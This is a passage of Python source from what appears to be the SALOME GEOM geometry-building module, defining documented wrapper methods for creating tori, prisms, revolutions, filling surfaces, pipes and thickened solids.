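#   Torus_1 = geompy.MakeTorus(p0, vz, 100., 20.)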
## Create a torus with given radiuses at the origin of coordinate system.
# @param theRMajor Torus major radius.
# @param theRMinor Torus minor radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created torus.
#
# @ref tui_creation_torus "Example"
@ManageTransactions("PrimOp")
def MakeTorusRR(self, theRMajor, theRMinor, theName=None):
"""
Create a torus with given radiuses at the origin of coordinate system.
Parameters:
theRMajor Torus major radius.
theRMinor Torus minor radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created torus.
"""
# Example: see GEOM_TestAll.py
theRMajor,theRMinor,Parameters = ParseParameters(theRMajor,theRMinor)
anObj = self.PrimOp.MakeTorusRR(theRMajor, theRMinor)
RaiseIfFailed("MakeTorusRR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "torus")
return anObj
# end of l3_3d_primitives
## @}
## @addtogroup l3_complex
## @{
## Create a shape by extrusion of the base shape along a vector, defined by two points.
# @param theBase Base shape to be extruded.
# @param thePoint1 First end of extrusion vector.
# @param thePoint2 Second end of extrusion vector.
# @param theScaleFactor Use it to make prism with scaled second base.
#                        Negative value means not scaled second base.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrism(self, theBase, thePoint1, thePoint2, theScaleFactor = -1.0, theName=None):
"""
Create a shape by extrusion of the base shape along a vector, defined by two points.
Parameters:
theBase Base shape to be extruded.
thePoint1 First end of extrusion vector.
thePoint2 Second end of extrusion vector.
theScaleFactor Use it to make prism with scaled second base.
Negative value means not scaled second base.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = None
Parameters = ""
if theScaleFactor > 0:
theScaleFactor,Parameters = ParseParameters(theScaleFactor)
anObj = self.PrimOp.MakePrismTwoPntWithScaling(theBase, thePoint1, thePoint2, theScaleFactor)
else:
anObj = self.PrimOp.MakePrismTwoPnt(theBase, thePoint1, thePoint2)
RaiseIfFailed("MakePrismTwoPnt", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
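# A usage sketch (illustrative: extrude a face between two points; passing
# a positive theScaleFactor would taper the second base; Face_1 as in the
# MakeFaceHW sketch above):
#   pA      = geompy.MakeVertex(0, 0, 0)
#   pB      = geompy.MakeVertex(0, 0, 100)
#   Prism_1 = geompy.MakePrism(Face_1, pA, pB)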
## Create a shape by extrusion of the base shape along a
# vector, defined by two points, in 2 Ways (forward/backward).
# @param theBase Base shape to be extruded.
# @param thePoint1 First end of extrusion vector.
# @param thePoint2 Second end of extrusion vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrism2Ways(self, theBase, thePoint1, thePoint2, theName=None):
"""
Create a shape by extrusion of the base shape along a
vector, defined by two points, in 2 Ways (forward/backward).
Parameters:
theBase Base shape to be extruded.
thePoint1 First end of extrusion vector.
thePoint2 Second end of extrusion vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakePrismTwoPnt2Ways(theBase, thePoint1, thePoint2)
RaiseIfFailed("MakePrismTwoPnt", self.PrimOp)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the vector,
# i.e. all the space, transfixed by the base shape during its translation
# along the vector on the given distance.
# @param theBase Base shape to be extruded.
# @param theVec Direction of extrusion.
# @param theH Prism dimension along theVec.
# @param theScaleFactor Use it to make prism with scaled second base.
# Negative value means not scaled second base.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismVecH(self, theBase, theVec, theH, theScaleFactor = -1.0, theName=None):
"""
Create a shape by extrusion of the base shape along the vector,
i.e. all the space, transfixed by the base shape during its translation
along the vector on the given distance.
Parameters:
theBase Base shape to be extruded.
theVec Direction of extrusion.
theH Prism dimension along theVec.
theScaleFactor Use it to make prism with scaled second base.
Negative value means not scaled second base.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = None
Parameters = ""
if theScaleFactor > 0:
theH,theScaleFactor,Parameters = ParseParameters(theH,theScaleFactor)
anObj = self.PrimOp.MakePrismVecHWithScaling(theBase, theVec, theH, theScaleFactor)
else:
theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakePrismVecH(theBase, theVec, theH)
RaiseIfFailed("MakePrismVecH", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
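# A usage sketch (illustrative: extrude Face_1 by 100 along OZ; the scale
# factor of 0.5 shrinks the second base to half size):
#   vz      = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   Prism_2 = geompy.MakePrismVecH(Face_1, vz, 100., theScaleFactor=0.5)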
## Create a shape by extrusion of the base shape along the vector,
# i.e. all the space, transfixed by the base shape during its translation
# along the vector on the given distance in 2 Ways (forward/backward).
# @param theBase Base shape to be extruded.
# @param theVec Direction of extrusion.
# @param theH Prism dimension along theVec in forward direction.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismVecH2Ways(self, theBase, theVec, theH, theName=None):
"""
Create a shape by extrusion of the base shape along the vector,
i.e. all the space, transfixed by the base shape during its translation
along the vector on the given distance in 2 Ways (forward/backward).
Parameters:
theBase Base shape to be extruded.
theVec Direction of extrusion.
theH Prism dimension along theVec in forward direction.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakePrismVecH2Ways(theBase, theVec, theH)
RaiseIfFailed("MakePrismVecH2Ways", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the dx, dy, dz direction
# @param theBase Base shape to be extruded.
# @param theDX, theDY, theDZ Directions of extrusion.
# @param theScaleFactor Use it to make prism with scaled second base.
#                        Negative value means not scaled second base.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismDXDYDZ(self, theBase, theDX, theDY, theDZ, theScaleFactor = -1.0, theName=None):
"""
Create a shape by extrusion of the base shape along the dx, dy, dz direction
Parameters:
theBase Base shape to be extruded.
theDX, theDY, theDZ Directions of extrusion.
theScaleFactor Use it to make prism with scaled second base.
Negative value means not scaled second base.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = None
Parameters = ""
if theScaleFactor > 0:
theDX,theDY,theDZ,theScaleFactor,Parameters = ParseParameters(theDX, theDY, theDZ, theScaleFactor)
anObj = self.PrimOp.MakePrismDXDYDZWithScaling(theBase, theDX, theDY, theDZ, theScaleFactor)
else:
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.PrimOp.MakePrismDXDYDZ(theBase, theDX, theDY, theDZ)
RaiseIfFailed("MakePrismDXDYDZ", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the dx, dy, dz direction
# i.e. all the space, transfixed by the base shape during its translation
# along the vector on the given distance in 2 Ways (forward/backward).
# @param theBase Base shape to be extruded.
# @param theDX, theDY, theDZ Directions of extrusion.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismDXDYDZ2Ways(self, theBase, theDX, theDY, theDZ, theName=None):
"""
Create a shape by extrusion of the base shape along the dx, dy, dz direction
i.e. all the space, transfixed by the base shape during its translation
along the vector on the given distance in 2 Ways (forward/backward).
Parameters:
theBase Base shape to be extruded.
theDX, theDY, theDZ Directions of extrusion.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.PrimOp.MakePrismDXDYDZ2Ways(theBase, theDX, theDY, theDZ)
RaiseIfFailed("MakePrismDXDYDZ2Ways", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by revolution of the base shape around the axis
# on the given angle, i.e. all the space, transfixed by the base
# shape during its rotation around the axis on the given angle.
# @param theBase Base shape to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created revolution.
#
# @ref tui_creation_revolution "Example"
@ManageTransactions("PrimOp")
def MakeRevolution(self, theBase, theAxis, theAngle, theName=None):
"""
Create a shape by revolution of the base shape around the axis
on the given angle, i.e. all the space, transfixed by the base
shape during its rotation around the axis on the given angle.
Parameters:
theBase Base shape to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created revolution.
"""
# Example: see GEOM_TestAll.py
theAngle,Parameters = ParseParameters(theAngle)
anObj = self.PrimOp.MakeRevolutionAxisAngle(theBase, theAxis, theAngle)
RaiseIfFailed("MakeRevolutionAxisAngle", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "revolution")
return anObj
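# A usage sketch (illustrative: revolve Face_1 by a quarter turn around an
# axis along OX; note the angle is given in radians):
#   ox      = geompy.MakeVectorDXDYDZ(1, 0, 0)
#   Revol_1 = geompy.MakeRevolution(Face_1, ox, math.pi/2)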
## Create a shape by revolution of the base shape around the axis
# on the given angle, i.e. all the space, transfixed by the base
# shape during its rotation around the axis on the given angle in
# both directions (forward/backward)
# @param theBase Base shape to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created revolution.
#
# @ref tui_creation_revolution "Example"
@ManageTransactions("PrimOp")
def MakeRevolution2Ways(self, theBase, theAxis, theAngle, theName=None):
"""
Create a shape by revolution of the base shape around the axis
on the given angle, i.e. all the space, transfixed by the base
shape during its rotation around the axis on the given angle in
both directions (forward/backward).
Parameters:
theBase Base shape to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created revolution.
"""
theAngle,Parameters = ParseParameters(theAngle)
anObj = self.PrimOp.MakeRevolutionAxisAngle2Ways(theBase, theAxis, theAngle)
RaiseIfFailed("MakeRevolutionAxisAngle2Ways", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "revolution")
return anObj
## Create a filling from the given compound of contours.
# @param theShape the compound of contours
# @param theMinDeg a minimal degree of BSpline surface to create
# @param theMaxDeg a maximal degree of BSpline surface to create
# @param theTol2D a 2d tolerance to be reached
# @param theTol3D a 3d tolerance to be reached
#  @param theNbIter a number of iterations of the approximation algorithm
#  @param theMethod Kind of method to perform filling operation (see GEOM::filling_oper_method())
# @param isApprox if True, BSpline curves are generated in the process
# of surface construction. By default it is False, that means
# the surface is created using given curves. The usage of
# Approximation makes the algorithm work slower, but allows
# building the surface for rather complex cases.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created filling surface.
#
# @ref tui_creation_filling "Example"
@ManageTransactions("PrimOp")
def MakeFilling(self, theShape, theMinDeg=2, theMaxDeg=5, theTol2D=0.0001,
theTol3D=0.0001, theNbIter=0, theMethod=GEOM.FOM_Default, isApprox=0, theName=None):
"""
Create a filling from the given compound of contours.
Parameters:
theShape the compound of contours
theMinDeg a minimal degree of BSpline surface to create
theMaxDeg a maximal degree of BSpline surface to create
theTol2D a 2d tolerance to be reached
theTol3D a 3d tolerance to be reached
theNbIter a number of iterations of the approximation algorithm
theMethod Kind of method to perform filling operation (see GEOM::filling_oper_method())
isApprox if True, BSpline curves are generated in the process
of surface construction. By default it is False, that means
the surface is created using given curves. The usage of
Approximation makes the algorithm work slower, but allows
building the surface for rather complex cases
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created filling surface.
Example of usage:
filling = geompy.MakeFilling(compound, 2, 5, 0.0001, 0.0001, 5)
"""
# Example: see GEOM_TestAll.py
theMinDeg,theMaxDeg,theTol2D,theTol3D,theNbIter,Parameters = ParseParameters(theMinDeg, theMaxDeg, theTol2D, theTol3D, theNbIter)
anObj = self.PrimOp.MakeFilling(theShape, theMinDeg, theMaxDeg,
theTol2D, theTol3D, theNbIter,
theMethod, isApprox)
RaiseIfFailed("MakeFilling", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "filling")
return anObj
## Create a filling from the given compound of contours.
# This method corresponds to MakeFilling with isApprox=True
# @param theShape the compound of contours
# @param theMinDeg a minimal degree of BSpline surface to create
# @param theMaxDeg a maximal degree of BSpline surface to create
# @param theTol3D a 3d tolerance to be reached
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created filling surface.
#
# @ref tui_creation_filling "Example"
@ManageTransactions("PrimOp")
def MakeFillingNew(self, theShape, theMinDeg=2, theMaxDeg=5, theTol3D=0.0001, theName=None):
"""
Create a filling from the given compound of contours.
This method corresponds to MakeFilling with isApprox=True
Parameters:
theShape the compound of contours
theMinDeg a minimal degree of BSpline surface to create
theMaxDeg a maximal degree of BSpline surface to create
theTol3D a 3d tolerance to be reached
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created filling surface.
Example of usage:
filling = geompy.MakeFillingNew(compound, 2, 5, 0.0001)
"""
# Example: see GEOM_TestAll.py
theMinDeg,theMaxDeg,theTol3D,Parameters = ParseParameters(theMinDeg, theMaxDeg, theTol3D)
anObj = self.PrimOp.MakeFilling(theShape, theMinDeg, theMaxDeg,
0, theTol3D, 0, GEOM.FOM_Default, True)
RaiseIfFailed("MakeFillingNew", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "filling")
return anObj
## Create a shell or solid passing through a set of sections. Sections should be wires, edges or vertices.
# @param theSeqSections - set of specified sections.
# @param theModeSolid - mode defining building solid or shell
# @param thePreci - precision 3D used for smoothing
# @param theRuled - mode defining type of the result surfaces (ruled or smoothed).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created shell or solid.
#
# @ref swig_todo "Example"
@ManageTransactions("PrimOp")
def MakeThruSections(self, theSeqSections, theModeSolid, thePreci, theRuled, theName=None):
"""
Create a shell or solid passing through a set of sections. Sections should be wires, edges or vertices.
Parameters:
theSeqSections - set of specified sections.
theModeSolid - mode defining building solid or shell
thePreci - precision 3D used for smoothing
theRuled - mode defining type of the result surfaces (ruled or smoothed).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created shell or solid.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeThruSections(theSeqSections,theModeSolid,thePreci,theRuled)
RaiseIfFailed("MakeThruSections", self.PrimOp)
self._autoPublish(anObj, theName, "filling")
return anObj
## Create a shape by extrusion of the base shape along
# the path shape. The path shape can be a wire or an edge.
# @param theBase Base shape to be extruded.
# @param thePath Path shape to extrude the base shape along it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created pipe.
#
# @ref tui_creation_pipe "Example"
@ManageTransactions("PrimOp")
def MakePipe(self, theBase, thePath, theName=None):
"""
Create a shape by extrusion of the base shape along
the path shape. The path shape can be a wire or an edge.
Parameters:
theBase Base shape to be extruded.
thePath Path shape to extrude the base shape along it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created pipe.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakePipe(theBase, thePath)
RaiseIfFailed("MakePipe", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
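# A usage sketch (hypothetical "profile" face and "path" wire built with
# the primitives above; the profile is typically placed orthogonal to the
# start of the path for a clean sweep):
#   Pipe_1 = geompy.MakePipe(profile, path, theName="Pipe_1")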
## Create a shape by extrusion of the profile shape along
# the path shape. The path shape can be a wire or an edge.
#  Several profiles can be specified at several locations along the path.
#  @param theSeqBases - list of base shapes to be extruded.
#  @param theLocations - list of locations on the path corresponding to the
#                        specified list of base shapes. The number of locations
#                        should be equal to the number of bases, or the list of locations can be empty.
# @param thePath - Path shape to extrude the base shape along it.
# @param theWithContact - the mode defining that the section is translated to be in
# contact with the spine.
# @param theWithCorrection - defining that the section is rotated to be
# orthogonal to the spine tangent in the correspondent point
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created pipe.
#
# @ref tui_creation_pipe_with_diff_sec "Example"
@ManageTransactions("PrimOp")
def MakePipeWithDifferentSections(self, theSeqBases,
theLocations, thePath,
theWithContact, theWithCorrection, theName=None):
"""
Create a shape by extrusion of the profile shape along
the path shape. The path shape can be a wire or an edge.
Several profiles can be specified at several locations along the path.
Parameters:
theSeqBases - list of base shapes to be extruded.
theLocations - list of locations on the path corresponding to the
specified list of base shapes. The number of locations
should be equal to the number of bases, or the list of locations can be empty.
thePath - Path shape to extrude the base shape along it.
theWithContact - the mode defining that the section is translated to be in
contact with the spine(0/1)
theWithCorrection - defining that the section is rotated to be
orthogonal to the spine tangent in the correspondent point (0/1)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created pipe.
"""
anObj = self.PrimOp.MakePipeWithDifferentSections(theSeqBases,
theLocations, thePath,
theWithContact, theWithCorrection)
RaiseIfFailed("MakePipeWithDifferentSections", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Create a shape by extrusion of the profile shape along
#  the path shape. The path shape can be a wire or an edge.
#  Several profiles can be specified at several locations along the path.
#  @param theSeqBases - list of base shapes to be extruded. Each base shape must be
#                       a shell or a face. If the numbers of faces in neighbouring sections
#                       do not coincide, the resulting solid between such sections will
#                       be created using the external boundaries of these shells.
# @param theSeqSubBases - list of corresponding sub-shapes of section shapes.
# This list is used for searching correspondences between
# faces in the sections. Size of this list must be equal
# to size of list of base shapes.
#  @param theLocations - list of locations on the path corresponding to the
#                        specified list of base shapes. The number of locations
#                        should be equal to the number of bases. The first and last
#                        locations must coincide with the first and last vertices
#                        of the path, respectively.
# @param thePath - Path shape to extrude the base shape along it.
# @param theWithContact - the mode defining that the section is translated to be in
# contact with the spine.
# @param theWithCorrection - defining that the section is rotated to be
# orthogonal to the spine tangent in the correspondent point
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solids.
#
# @ref tui_creation_pipe_with_shell_sec "Example"
@ManageTransactions("PrimOp")
def MakePipeWithShellSections(self, theSeqBases, theSeqSubBases,
theLocations, thePath,
theWithContact, theWithCorrection, theName=None):
"""
Create a shape by extrusion of the profile shape along
the path shape. The path shape can be a wire or an edge.
Several profiles can be specified at several locations along the path.
Parameters:
theSeqBases - list of base shapes to be extruded. Each base shape must be
a shell or a face. If the numbers of faces in neighbouring sections
do not coincide, the resulting solid between such sections will
be created using the external boundaries of these shells.
theSeqSubBases - list of corresponding sub-shapes of section shapes.
This list is used for searching correspondences between
faces in the sections. Size of this list must be equal
to size of list of base shapes.
theLocations - list of locations on the path corresponding to the
specified list of base shapes. The number of locations
should be equal to the number of bases. The first and last
locations must coincide with the first and last vertices
of the path, respectively.
thePath - Path shape to extrude the base shape along it.
theWithContact - the mode defining that the section is translated to be in
contact with the spine (0/1)
theWithCorrection - defining that the section is rotated to be
orthogonal to the spine tangent in the correspondent point (0/1)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solids.
"""
anObj = self.PrimOp.MakePipeWithShellSections(theSeqBases, theSeqSubBases,
theLocations, thePath,
theWithContact, theWithCorrection)
RaiseIfFailed("MakePipeWithShellSections", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Create a shape by extrusion of the profile shape along
#  the path shape. This function is used only to debug the pipe
#  functionality - it is a version of function MakePipeWithShellSections()
#  which gives the possibility to receive information about
#  the pipe creation between each pair of sections, step by step.
@ManageTransactions("PrimOp")
def MakePipeWithShellSectionsBySteps(self, theSeqBases, theSeqSubBases,
theLocations, thePath,
theWithContact, theWithCorrection, theName=None):
"""
Create a shape by extrusion of the profile shape along
the path shape. This function is used only for debug pipe
functionality - it is a version of the previous function
geompy.MakePipeWithShellSections() which gives the possibility to
receive information about pipe creation between each pair of
sections, step by step.
"""
res = []
nbsect = len(theSeqBases)
nbsubsect = len(theSeqSubBases)
#print "nbsect = ",nbsect
for i in range(1,nbsect):
#print " i = ",i
tmpSeqBases = [ theSeqBases[i-1], theSeqBases[i] ]
tmpLocations = [ theLocations[i-1], theLocations[i] ]
tmpSeqSubBases = []
if nbsubsect>0: tmpSeqSubBases = [ theSeqSubBases[i-1], theSeqSubBases[i] ]
anObj = self.PrimOp.MakePipeWithShellSections(tmpSeqBases, tmpSeqSubBases,
tmpLocations, thePath,
theWithContact, theWithCorrection)
if self.PrimOp.IsDone() == 0:
print "Problems with pipe creation between sections %d and %d" % (i, i+1)
RaiseIfFailed("MakePipeWithShellSections", self.PrimOp)
break
else:
print "Pipe between sections %d and %d is OK" % (i, i+1)
res.append(anObj)
pass
pass
resc = self.MakeCompound(res)
#resc = self.MakeSewing(res, 0.001)
#print "resc: ",resc
self._autoPublish(resc, theName, "pipe")
return resc
## Create solids between given sections
# @param theSeqBases - list of sections (shell or face).
# @param theLocations - list of corresponding vertexes
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solids.
#
# @ref tui_creation_pipe_without_path "Example"
@ManageTransactions("PrimOp")
def MakePipeShellsWithoutPath(self, theSeqBases, theLocations, theName=None):
"""
Create solids between given sections
Parameters:
theSeqBases - list of sections (shell or face).
theLocations - list of corresponding vertexes
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solids.
"""
anObj = self.PrimOp.MakePipeShellsWithoutPath(theSeqBases, theLocations)
RaiseIfFailed("MakePipeShellsWithoutPath", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
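
# Illustrative sketch (assumptions: "geompy" is an initialized geomBuilder
# instance; f1, f2 are faces and c1, c2 their anchor vertexes built elsewhere).
# The solids are lofted directly between the sections, with no path shape:
#
#   loft = geompy.MakePipeShellsWithoutPath([f1, f2], [c1, c2])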
## Create a shape by extrusion of the base shape along
# the path shape with constant bi-normal direction along the given vector.
# The path shape can be a wire or an edge.
# @param theBase Base shape to be extruded.
# @param thePath Path shape to extrude the base shape along it.
# @param theVec Vector defines a constant binormal direction to keep the
#               same angle between the direction and the sections
# along the sweep surface.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created pipe.
#
# @ref tui_creation_pipe "Example"
@ManageTransactions("PrimOp")
def MakePipeBiNormalAlongVector(self, theBase, thePath, theVec, theName=None):
"""
Create a shape by extrusion of the base shape along
the path shape with constant bi-normal direction along the given vector.
The path shape can be a wire or an edge.
Parameters:
theBase Base shape to be extruded.
thePath Path shape to extrude the base shape along it.
theVec Vector defines a constant binormal direction to keep the
same angle between the direction and the sections
along the sweep surface.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created pipe.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakePipeBiNormalAlongVector(theBase, thePath, theVec)
RaiseIfFailed("MakePipeBiNormalAlongVector", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
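
# Hedged sketch: keep the profile's bi-normal locked to the global Z axis while
# sweeping. "profile" and "path" are assumed to be a base shape and a wire/edge
# created beforehand:
#
#   vz   = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   pipe = geompy.MakePipeBiNormalAlongVector(profile, path, vz)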
## Makes a thick solid from a face or a shell
# @param theShape Face or Shell to be thickened
# @param theThickness Thickness of the resulting solid
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid
#
@ManageTransactions("PrimOp")
def MakeThickSolid(self, theShape, theThickness, theName=None):
"""
Make a thick solid from a face or a shell
Parameters:
theShape Face or Shell to be thickened
theThickness Thickness of the resulting solid
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeThickening(theShape, theThickness, True)
RaiseIfFailed("MakeThickening", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
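
# Usage sketch, assuming "geompy" is an initialized geomBuilder instance.
# One face of a box is thickened into a 5-unit plate; taking the first face
# returned by SubShapeAll is an arbitrary choice for illustration:
#
#   box   = geompy.MakeBoxDXDYDZ(100, 100, 100)
#   face  = geompy.SubShapeAll(box, geompy.ShapeType["FACE"])[0]
#   plate = geompy.MakeThickSolid(face, 5.)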
## Modifies a face or a shell to make it a thick solid
# @param theShape Face or Shell to be thickened
# @param theThickness Thickness of the resulting solid
#
# @return The modified shape
#
@ManageTransactions("PrimOp")
def Thicken(self, theShape, theThickness):
"""
Modifies a face or a shell to make it a thick solid
Parameters:
theShape Face or Shell to be thickened.
theThickness Thickness of the resulting solid.
Returns:
The modified shape
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeThickening(theShape, theThickness, False)
RaiseIfFailed("MakeThickening", self.PrimOp)
return anObj
## Build a middle path of a pipe-like shape.
# The path shape can be a wire or an edge.
# @param theShape It can be closed or unclosed pipe-like shell
# or a pipe-like solid.
# @param theBase1, theBase2 Two bases of the supposed pipe. This
# should be wires or faces of theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note It is not assumed that exact or approximate copy of theShape
# can be obtained by applying existing Pipe operation on the
# resulting "Path" wire taking theBase1 as the base - it is not
# always possible; though it might work in some particular cases,
# it is not guaranteed. Thus, the RestorePath function should not be
# considered as an exact reverse operation of the Pipe.
#
# @return New GEOM.GEOM_Object, containing an edge or wire that represents
#         the source pipe's "path".
#
# @ref tui_creation_pipe_path "Example"
@ManageTransactions("PrimOp")
def RestorePath (self, theShape, theBase1, theBase2, theName=None):
"""
Build a middle path of a pipe-like shape.
The path shape can be a wire or an edge.
Parameters:
theShape It can be closed or unclosed pipe-like shell
or a pipe-like solid.
theBase1, theBase2 Two bases of the supposed pipe. This
should be wires or faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
